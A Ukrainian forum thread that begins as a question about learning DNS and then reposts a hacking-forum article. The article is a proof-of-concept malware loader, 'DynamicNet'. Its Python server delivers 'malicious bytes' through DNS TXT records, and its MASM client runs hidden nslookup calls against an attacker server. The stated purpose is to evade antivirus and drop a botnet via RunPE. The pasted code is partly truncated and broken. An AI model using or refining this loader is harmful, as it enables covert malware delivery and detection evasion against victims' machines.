Тема: Де почитати про DNS?

Де почитати про DNS? Мені треба докладний опис протоколів з підняттям власного сервера. Не розумію джерельні коди - http://lockboxx.blogspot.com/2015/01/py … shell.html

Подякували: leofun011


Re: Де почитати про DNS?

Три десятки RFC: https://tools.ietf.org/html/rfc1035

Подякували: leofun01, 0xDADA11C7, HetmanNet3


Re: Де почитати про DNS?

Взагалі на якому рівні ви плануєте працювати з  DNS? За посиланням вся робота перекладається на бібліотеку dns.resolver. А вам ніби глибше треба.

Подякували: leofun01, 0xDADA11C72

4 Востаннє редагувалося reverse2500 (03.08.2020 11:20:24)

Re: Де почитати про DNS?

добрий день, DNS серверів є теж не мало, найпоширеніший BIND
DNSSEC Project Archive
RFC5011 - Automated Updates of DNS Security (DNSSEC Trust Anchors

Подякували: leofun01, 0xDADA11C72


Re: Де почитати про DNS?

Якшо на низькому рiвнi https://firststeps.ru/protocol/dns/dns1.html

подивiться на хакфорумс, була стаття з джерельними кодами (на масм) + сервер на пiтон, як не найдете, вечором кину в лс.

Подякували: koala, Chemist-i, leofun01, 0xDADA11C7, reverse25005


Re: Де почитати про DNS?

Якшо комусь ще цiкаво, обiцяна вище стаття

посилання на iнглiш форум

треба рега, або вхiд через якийсь сервiс типу гугл/фейсб/гхб

Подякували: 0xDADA11C71


Re: Де почитати про DNS?

Раніше з України на хакфорумс не пускало взагалі,


Re: Де почитати про DNS?

Так розумію без реєстрації там дудки що почитаєш?


Re: Де почитати про DNS?

Так, треба юзати впн, я просто завжди з нього сиджу; а так СНГ ip не пускають. От та стаття, копiюю сюди,

Прихований текст

Download to disk and execute is dead, every AV and your grandmother can detect someone making a HTTP transaction them dropping to disk.

Bypass HTTP entirely, Bypass Disk Entirely

Enter DynamicNet, a MASM PoC Full concept coming soon that uses DNS txt records to transmit data to a machine without touching the disk or even sending a single HTTP packet. Perfect for a basic loader that needs to drop your awesome botnet without arising too much suspicion such as disk activity or HTTP requests.

"How exactly does this work?"
DynamicNet uses two programs, A server written in python to pass your malicious bytes to the client and a client in MASM (could be ported to .net if you hate yourself) to retrieve your malicious bytes. As it stands the basic PoC bin compiles to 2.5kb without any optimization so thats awesome.

"Why is this any better than using a direct socket connection?"
Your average AV is going to see opening any sort of socket as a huge flag from a heuristic standpoint. DynamicNet uses the nslookup command which is built into windows to make the request, since nslookup is installed by default and is used in many applications to fetch DNS information the call to it looks routine to an AV

"gib source!"
1. Run the simple Python script on a server (ideally linux with a public IP) make sure to edit line 38 to reflect your "malicious" bytes
2. Edit line 14 in the MASM code to include the IP of the server from step 1
3. Compile the MASM code
4. Run the MASM bin
5. Enjoy the show

More will be coming from this soon, maybe a real loader/crypter via DNS if im feeling up to it.

Python script

import socket
import struct

class DNSQuery:
  def __init__(Self, Data):

    tipo = (ord(Data[2]) >> 3) & 15   # Opcode bits
    if tipo == 0:      # Standard query
      while lon != 0:

  def ReplyTXT(Self,ReplyString):
    if Self.Domain:
      ReplyLength = len(ReplyString)
      Packet+=Self.Data[:2] + "\x81\x80"
      Packet+=Self.Data[4:6] + Self.Data[4:6] + '\x00\x00\x00\x00' #Questions and Answers Counts
      Packet+=Self.Data[12:] #Original Domain Name Question
      Packet+='\xc0\x0c' #Pointer to domain name
      Packet+='\x00\x10\x00\x01\x00\x00\x00\x3c' #Reply type and TTL
      Packet+=struct.pack(">h",ReplyLength + 1) #Data Legnth    
      Packet+=struct.pack(">h", ReplyLength) #TXT Length
      Packet+=ReplyString #TXT
    return Packet

if __name__ == '__main__':
  print 'DynamicDNS Server Active'

  udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  LogFile = open('DynamicDNS_Log.txt','a')
  HelloString='Put Your Malicious Bytes Here'
    while 1:
      Data, addr = udps.recvfrom(1024)
      udps.sendto(Query.ReplyTXT('@' + HelloString + '@'), addr)
      print 'Request: %s Replied With: %s' % (Query.Domain,HelloString)
      LogFile.write('Request:  ' + Query.Domain + ' Replied With ' + HelloString)
  except KeyboardInterrupt:
    print 'Exiting...'
.model flat,stdcall
option casemap:none

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc

includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib

lookupcmd db "nslookup -type=txt not_a_real_domain <server ip goes here>",0 ;Edit me or I wont work

pipe_read dd ?
pipe_write dd ?

bwr dd ?

buffer db 1024 dup(?)
parsedbuffer db 1024 dup(?)

GetWord proc string:DWORD,wrd:DWORD,brk:BYTE,buff:DWORD,buffsize:DWORD ;Splitting up strings example, borrowed from http://tinyurl.com/d8gunp4

    .if string!=0 && buff!=0
        xor edx,edx;edx=wordcnt
        mov esi,string
        mov bl,[esi]
        call skipBrk
        .while bl!=0
            .if bl==brk
                inc edx
                call skipBrk
            .break .if edx==wrd || bl==0
            inc esi
            mov bl,[esi]
    .if bl!=0
        mov edi,buff
        xor ecx,ecx
        dec buffsize
        .while bl!=0 && bl!=brk && ecx<buffsize
            mov bl,[esi]
            mov [edi],bl
            inc ecx
            inc esi
            inc edi
        dec ecx
        mov byte ptr [edi-1],0
        mov rett,ecx
        mov rett,-1;word doesnt exist
        mov rett,-1;one or more string parameters are null
    mov eax,rett
    .while bl==brk && bl!=0
        inc esi
        mov bl,[esi]
    db 0c3h
GetWord endp
finished proc
    invoke GetWord, addr buffer,1,"@",addr parsedbuffer,sizeof parsedbuffer
    invoke MessageBox,0,addr parsedbuffer,0,0
    ;Take contents of parsedbuffer and reflect into your 133t RunPE for xXx420botnetxXx
    invoke ExitProcess,0
finished EndP
StartFunction proc
;Killer pipe explanation from berniee/[Xero]
local security_attrib :SECURITY_ATTRIBUTES  
local stinfo :STARTUPINFO  

mov security_attrib.lpSecurityDescriptor,0
mov security_attrib.bInheritHandle,TRUE
mov security_attrib.nLength,sizeof SECURITY_ATTRIBUTES

invoke CreatePipe,addr pipe_read,addr pipe_write,addr security_attrib,0

mov stinfo.cb,sizeof STARTUPINFO
mov eax, pipe_write
mov stinfo.hStdOutput,eax
mov stinfo.hStdError,eax
mov stinfo.wShowWindow,SW_HIDE

invoke CreateProcess,0,addr lookupcmd,0,0,TRUE,0,0,0,addr stinfo,addr pinfo
invoke CloseHandle,pipe_write

invoke ReadFile,pipe_read,addr buffer,1024,addr bwr,0
or eax,eax
.if eax == 0
    invoke finished
jmp pipeloop

StartFunction endp
end LogicStart

Код на асмi кончений, треба юзати свою реалiзацiю на сокетах, а не стороннi программи, але думаю не проблема написати клiент;

Подякували: 0xDADA11C71